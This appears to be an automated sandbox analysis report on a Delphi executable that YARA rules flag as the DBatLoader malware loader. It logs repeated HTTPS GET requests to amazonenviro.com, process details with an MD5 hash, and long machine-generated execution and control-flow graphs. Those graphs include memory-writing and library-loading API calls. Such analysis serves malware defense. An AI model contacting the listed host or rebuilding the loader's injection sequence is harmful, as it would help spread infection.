                    58192.168.2.650104166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:26:04 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:26:04 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:26:04 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    59192.168.2.650106166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:26:06 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:26:06 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:26:06 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    60192.168.2.650108166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:26:08 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:26:08 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:26:08 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    61192.168.2.650110166.62.27.1884436228C:\Users\user\Desktop\UAHIzSm2x2.exe
                    TimestampBytes transferredDirectionData
                    2025-01-14 07:26:09 UTC165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:26:10 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:26:10 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    System Behavior

                    General

                    Target ID:0
                    Start time:02:24:06
                    Start date:14/01/2025
                    Path:C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\UAHIzSm2x2.exe"
                    Imagebase:0x400000
                    File size:1'161'216 bytes
                    MD5 hash:483AB6BD562B28782D0999ABEC4F57F5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:Borland Delphi
                    Yara matches:
                    • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.3461173693.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.3446485255.00000000022F6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:6.4%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:14.6%
                      Total number of Nodes:268
                      Total number of Limit Nodes:15
                      execution_graph 25637 2894c48 25638 2894c6f 25637->25638 25640 2894c4c 25637->25640 25639 2894c0c 25642 2894c20 25639->25642 25643 2894c12 SysFreeString 25639->25643 25640->25639 25641 2894c5f SysReAllocStringLen 25640->25641 25641->25638 25644 2894bdc 25641->25644 25643->25642 25645 2894bf8 25644->25645 25646 2894be8 SysAllocStringLen 25644->25646 25646->25644 25646->25645 25647 28bbf78 25650 28af0a8 25647->25650 25651 28af0b0 25650->25651 25651->25651 28827 28a8704 LoadLibraryW 25651->28827 25653 28af0d2 28832 2892ee0 QueryPerformanceCounter 25653->28832 25655 28af0d7 25656 28af0e1 InetIsOffline 25655->25656 25657 28af0eb 25656->25657 25658 28af0fc 25656->25658 28844 2894500 25657->28844 25660 2894500 11 API calls 25658->25660 25661 28af0fa 25660->25661 28835 289480c 25661->28835 28850 28a80c0 28827->28850 28829 28a873d 28861 28a7cf8 28829->28861 28833 2892ef8 GetTickCount 28832->28833 28834 2892eed 28832->28834 28833->25655 28834->25655 28836 289481d 28835->28836 28837 289485a 28836->28837 28838 2894843 28836->28838 28840 2894570 11 API calls 28837->28840 28839 2894b78 11 API calls 28838->28839 28842 2894850 28839->28842 28840->28842 28841 289488b 28842->28841 28843 2894500 11 API calls 28842->28843 28843->28841 28845 2894504 28844->28845 28848 2894514 28844->28848 28847 2894570 11 API calls 28845->28847 28845->28848 28846 2894542 28846->25661 28847->28848 28848->28846 28935 2892c2c 11 API calls 28848->28935 28851 2894500 11 API calls 28850->28851 28852 28a80e5 28851->28852 28875 28a790c 28852->28875 28856 28a80ff 28857 28a8107 GetModuleHandleW GetProcAddress GetProcAddress 28856->28857 28858 28a813a 28857->28858 28896 28944d0 28858->28896 28862 2894500 11 API calls 28861->28862 28863 28a7d1d 28862->28863 28864 28a790c 12 API calls 28863->28864 28865 28a7d2a 28864->28865 28866 2894798 11 API calls 28865->28866 28867 28a7d3a 28866->28867 28924 28a8018 28867->28924 28870 28a80c0 15 API calls 28871 28a7d53 NtWriteVirtualMemory 28870->28871 28872 28a7d7f 28871->28872 28873 28944d0 11 API calls 28872->28873 28874 28a7d8c FreeLibrary 28873->28874 28874->25653 28876 28a791d 28875->28876 28900 2894b78 28876->28900 28878 28a7999 28881 2894798 28878->28881 28879 28a792d 28879->28878 28909 289ba3c CharNextA 28879->28909 28882 28947fd 28881->28882 28883 289479c 28881->28883 28884 2894500 28883->28884 28887 28947a4 28883->28887 28889 2894570 11 API calls 28884->28889 28891 2894514 28884->28891 28885 2894542 28885->28856 28886 28947b3 28890 2894570 11 API calls 28886->28890 28887->28882 28887->28886 28888 2894500 11 API calls 28887->28888 28888->28886 28889->28891 28893 28947cd 28890->28893 28891->28885 28922 2892c2c 11 API calls 28891->28922 28894 2894500 11 API calls 28893->28894 28895 28947f9 28894->28895 28895->28856 28898 28944d6 28896->28898 28897 28944fc 28897->28829 28898->28897 28923 2892c2c 11 API calls 28898->28923 28901 2894b85 28900->28901 28908 2894bb5 28900->28908 28903 2894bae 28901->28903 28906 2894b91 28901->28906 28911 2894570 28903->28911 28905 2894b9f 28905->28879 28910 2892c44 11 API calls 28906->28910 28916 28944ac 28908->28916 28909->28879 28910->28905 28912 2894598 28911->28912 28913 2894574 28911->28913 28912->28908 28920 2892c10 11 API calls 28913->28920 28915 2894581 28915->28908 28917 28944b2 28916->28917 28919 28944cd 28916->28919 28917->28919 28921 2892c2c 11 API calls 28917->28921 28919->28905 28920->28915 28921->28919 28922->28885 28923->28898 28925 2894500 11 API calls 28924->28925 28926 28a803b 28925->28926 28927 28a790c 12 API calls 28926->28927 28928 28a8048 28927->28928 28929 28a8050 GetModuleHandleA 28928->28929 28930 28a80c0 15 API calls 28929->28930 28931 28a8061 GetModuleHandleA 28930->28931 28932 28a807f 28931->28932 28933 28944ac 11 API calls 28932->28933 28934 28a7d4d 28933->28934 28934->28870 28935->28846 28936 2891c6c 28937 2891c7c 28936->28937 28938 2891d04 28936->28938 28939 2891c89 28937->28939 28940 2891cc0 28937->28940 28941 2891f58 28938->28941 28942 2891d0d 28938->28942 28943 2891c94 28939->28943 28984 2891724 28939->28984 28947 2891724 10 API calls 28940->28947 28944 2891fec 28941->28944 28949 2891f68 28941->28949 28950 2891fac 28941->28950 28945 2891d25 28942->28945 28946 2891e24 28942->28946 28951 2891d2c 28945->28951 28957 2891d48 28945->28957 28959 2891dfc 28945->28959 28960 2891e55 Sleep 28946->28960 28965 2891e7c 28946->28965 28967 2891e95 28946->28967 28952 2891cd7 28947->28952 28955 2891724 10 API calls 28949->28955 28953 2891fb2 28950->28953 28958 2891724 10 API calls 28950->28958 28969 2891a8c 8 API calls 28952->28969 28972 2891cfd 28952->28972 28954 2891ca1 28974 2891cb9 28954->28974 29008 2891a8c 28954->29008 28973 2891f82 28955->28973 28956 2891724 10 API calls 28971 2891f2c 28956->28971 28961 2891d79 Sleep 28957->28961 28962 2891d9c 28957->28962 28978 2891fc1 28958->28978 28963 2891724 10 API calls 28959->28963 28964 2891e6f Sleep 28960->28964 28960->28965 28961->28962 28966 2891d91 Sleep 28961->28966 28976 2891e05 28963->28976 28964->28946 28965->28956 28965->28967 28966->28957 28968 2891e1d 28969->28972 28971->28967 28975 2891a8c 8 API calls 28971->28975 28977 2891a8c 8 API calls 28973->28977 28981 2891fa7 28973->28981 28979 2891f50 28975->28979 28976->28968 28980 2891a8c 8 API calls 28976->28980 28977->28981 28978->28981 28982 2891a8c 8 API calls 28978->28982 28980->28968 28983 2891fe4 28982->28983 28985 2891968 28984->28985 28986 289173c 28984->28986 28987 2891a80 28985->28987 28988 2891938 28985->28988 28995 289174e 28986->28995 28999 28917cb Sleep 28986->28999 28990 2891a89 28987->28990 28991 2891684 VirtualAlloc 28987->28991 28992 2891947 Sleep 28988->28992 29002 2891986 28988->29002 28989 289175d 28989->28954 28990->28954 28993 28916bf 28991->28993 28994 28916af 28991->28994 28997 289195d Sleep 28992->28997 28992->29002 28993->28954 29025 2891644 28994->29025 28995->28989 28996 289182c 28995->28996 29000 289180a Sleep 28995->29000 29007 2891838 28996->29007 29031 28915cc 28996->29031 28997->28988 28999->28995 29001 28917e4 Sleep 28999->29001 29000->28996 29004 2891820 Sleep 29000->29004 29001->28986 29003 28915cc VirtualAlloc 29002->29003 29006 28919a4 29002->29006 29003->29006 29004->28995 29006->28954 29007->28954 29009 2891b6c 29008->29009 29010 2891aa1 29008->29010 29011 28916e8 29009->29011 29012 2891aa7 29009->29012 29010->29012 29014 2891b13 Sleep 29010->29014 29013 2891c66 29011->29013 29016 2891644 2 API calls 29011->29016 29015 2891ab0 29012->29015 29018 2891b4b Sleep 29012->29018 29022 2891b81 29012->29022 29013->28974 29014->29012 29017 2891b2d Sleep 29014->29017 29015->28974 29019 28916f5 VirtualFree 29016->29019 29017->29010 29020 2891b61 Sleep 29018->29020 29018->29022 29021 289170d 29019->29021 29020->29012 29021->28974 29023 2891c00 VirtualFree 29022->29023 29024 2891ba4 29022->29024 29023->28974 29024->28974 29026 2891681 29025->29026 29027 289164d 29025->29027 29026->28993 29027->29026 29028 289164f Sleep 29027->29028 29029 2891664 29028->29029 29029->29026 29030 2891668 Sleep 29029->29030 29030->29027 29035 2891560 29031->29035 29033 28915d4 VirtualAlloc 29034 28915eb 29033->29034 29034->29007 29036 2891500 29035->29036 29036->29033 29037 28bd2fc 29047 2896518 29037->29047 29041 28bd32a 29052 28bbf84 timeSetEvent 29041->29052 29043 28bd334 29044 28bd342 GetMessageA 29043->29044 29045 28bd352 29044->29045 29046 28bd336 TranslateMessage DispatchMessageA 29044->29046 29046->29044 29048 2896523 29047->29048 29053 2894168 29048->29053 29051 289427c SysAllocStringLen SysFreeString SysReAllocStringLen 29051->29041 29052->29043 29054 28941ae 29053->29054 29055 2894227 29054->29055 29059 28943b8 29054->29059 29067 2894100 29055->29067 29057 28943e9 29072 289432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 29057->29072 29059->29057 29062 28943fa 29059->29062 29061 28943f3 29061->29062 29063 289443f FreeLibrary 29062->29063 29064 2894463 29062->29064 29063->29062 29065 289446c 29064->29065 29066 2894472 ExitProcess 29064->29066 29065->29066 29068 2894143 29067->29068 29069 2894110 29067->29069 29068->29051 29069->29068 29070 28915cc VirtualAlloc 29069->29070 29073 2895814 29069->29073 29070->29069 29072->29061 29074 2895840 29073->29074 29075 2895824 GetModuleFileNameA 29073->29075 29074->29069 29077 2895a78 GetModuleFileNameA RegOpenKeyExA 29075->29077 29078 2895afb 29077->29078 29079 2895abb RegOpenKeyExA 29077->29079 29095 28958b4 12 API calls 29078->29095 29079->29078 29080 2895ad9 RegOpenKeyExA 29079->29080 29080->29078 29082 2895b84 lstrcpynA GetThreadLocale GetLocaleInfoA 29080->29082 29086 2895bbb 29082->29086 29087 2895c9e 29082->29087 29083 2895b20 RegQueryValueExA 29084 2895b40 RegQueryValueExA 29083->29084 29085 2895b5e RegCloseKey 29083->29085 29084->29085 29085->29074 29086->29087 29089 2895bcb lstrlenA 29086->29089 29087->29074 29090 2895be3 29089->29090 29090->29087 29091 2895c08 lstrcpynA LoadLibraryExA 29090->29091 29092 2895c30 29090->29092 29091->29092 29092->29087 29093 2895c3a lstrcpynA LoadLibraryExA 29092->29093 29093->29087 29094 2895c6c lstrcpynA LoadLibraryExA 29093->29094 29094->29087 29095->29083 29096 289e2e4 29097 289e2ff 29096->29097 29098 289e2f2 VariantClear 29096->29098 29099 289e315 29097->29099 29100 289e306 29097->29100 29110 289dfb0 29098->29110 29103 289e32d 29099->29103 29104 289e336 29099->29104 29105 289e2fd 29099->29105 29102 28944ac 11 API calls 29100->29102 29102->29105 29114 289e168 52 API calls 29103->29114 29115 28a2e24 EnterCriticalSection LeaveCriticalSection 29104->29115 29108 289e33f 29108->29105 29109 289e34f VariantClear VariantInit 29108->29109 29109->29105 29111 289dfb9 29110->29111 29112 289dfb4 29110->29112 29111->29105 29116 289dd5c 43 API calls 29112->29116 29114->29105 29115->29108 29116->29111

                      Executed Functions

                      Function 028AF0A8 Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535filesleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 28af0a8-28af0ab 1 28af0b0-28af0b5 0->1 1->1 2 28af0b7-28af0e9 call 28a8704 call 2892ee0 call 2892f08 InetIsOffline 1->2 9 28af0eb-28af0fa call 2894500 2->9 10 28af0fc-28af106 call 2894500 2->10 14 28af10b-28af3ce call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28aefc8 9->14 10->14 115 28bae5e-28bb3d4 call 28944d0 * 5 call 2894c0c call 28944ac call 2894c0c call 28944d0 call 28944ac call 28944d0 * 2 call 2894c0c call 28944d0 * 2 call 28944ac call 28944d0 call 28944ac call 28944d0 * 2 call 2894c0c call 28944d0 call 2894c0c call 28944d0 * 4 call 2894c0c call 28944ac call 2894c0c call 28944d0 * 2 call 28944ac call 28944d0 call 2894c24 call 28944d0 call 2894c24 call 28944d0 call 2894c0c call 28944ac call 2894c0c call 28944d0 * 2 call 28944ac call 2894c0c call 28944ac call 2894c0c call 28944d0 call 2894c0c call 28944ac call 2894c0c call 28944d0 call 2894c0c call 28944ac call 2894c0c call 28944d0 call 2894c0c call 28944ac call 2894c0c call 28944d0 * 2 call 2894c0c call 28944ac call 2894c0c call 28944d0 * 2 call 28944ac call 28944d0 call 2895788 call 28944d0 call 28944ac call 28944d0 * 2 call 289e374 call 28944d0 call 2895e58 call 28944d0 * 4 call 2895788 call 28944d0 call 2895788 call 28944d0 call 2894c0c call 28944d0 call 2894c0c call 28944ac call 28944d0 call 28944ac call 28944d0 call 2895788 call 28944d0 call 2894c0c call 28944d0 * 4 call 28944ac call 28944d0 14->115 116 28af3d4-28af3db call 28af024 14->116 116->115 121 28af3e1-28afd02 call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 28946a4 * 2 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28a894c call 289494c call 28946a4 call 28ae36c call 2894500 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894798 call 2897e10 116->121 592 28afd08-28afe10 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894500 121->592 593 28afe15-28aff28 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28ae36c call 2894500 121->593 655 28aff2d-28b0055 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289c2e4 call 2894500 592->655 593->655 688 28b005c-28b041d call 28949ac call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28ae36c call 2894500 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289494c call 28946a4 call 2897e10 655->688 689 28b0057-28b005a 655->689 800 28b0bdf-28b11b7 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894d8c call 28adfe4 call 2894500 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28ae4c0 call 28957c4 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894500 * 2 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28ae448 688->800 801 28b0423-28b0878 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894d8c call 28adfe4 call 2894500 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28ae4c0 call 28957c4 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894500 call 28ae448 688->801 689->688 1055 28b23b9-28b25bc call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c 800->1055 1188 28b11bd-28b16ec call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2897a80 call 28aea4c call 2894500 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28ae4c0 call 28957c4 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c 800->1188 801->1055 1056 28b087e-28b0bda call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289494c call 2894d20 call 28adfe4 call 2894500 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c 801->1056 1225 28b25be-28b25c1 1055->1225 1226 28b25c3-28b25c8 1055->1226 1056->1055 1539 28b16f6-28b190b call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894500 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28ae72c 1188->1539 1225->1226 1226->115 1229 28b25ce-28b2e78 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2897a80 call 28aea4c call 2894500 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28ada20 call 2894500 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894734 call 28ae4c0 call 28957c4 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894500 * 13 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289494c call 28946a4 call 2897e34 1226->1229 1781 28b2e7d-28b2e7f 1229->1781 1661 28b1911-28b1988 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c 1539->1661 1662 28b23a6-28b23b3 1539->1662 1690 28b198d-28b1a1a call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28ae8ec 1661->1690 1662->1055 1662->1539 1690->1662 1724 28b1a20-28b1b13 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c 1690->1724 1780 28b1b18-28b1b3b CoInitialize call 289480c 1724->1780 1785 28b1b40-28b1b8a call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 1780->1785 1783 28b301b-28b3126 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c 1781->1783 1784 28b2e85-28b3016 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289494c call 28946a4 call 2897fc8 1781->1784 1870 28b3128-28b312b 1783->1870 1871 28b312d-28b3345 call 28949ac call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894898 1783->1871 1784->1783 1815 28b1b8f-28b1b96 call 28a881c 1785->1815 1821 28b1b9b-28b1c12 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c 1815->1821 1863 28b1c17-28b1c22 call 28a6d48 1821->1863 1869 28b1c27-28b1ca2 call 28a2818 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 1863->1869 1911 28b1ca7-28b1cae call 28a881c 1869->1911 1870->1871 2013 28b334b-28b378d call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2897e10 1871->2013 2014 28b50ac-28b58fe call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28ae60c call 2894500 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2897a80 call 28aea4c call 2894500 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 28ae974 call 28ae9e8 call 2894500 call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c call 2894898 1871->2014 1917 28b1cb3-28b1d2a call 289480c call 289494c call 28946a4 call 2894798 call 289494c call 28946a4 call 28a881c 1911->1917 1948 28b1d2f-28b1d47 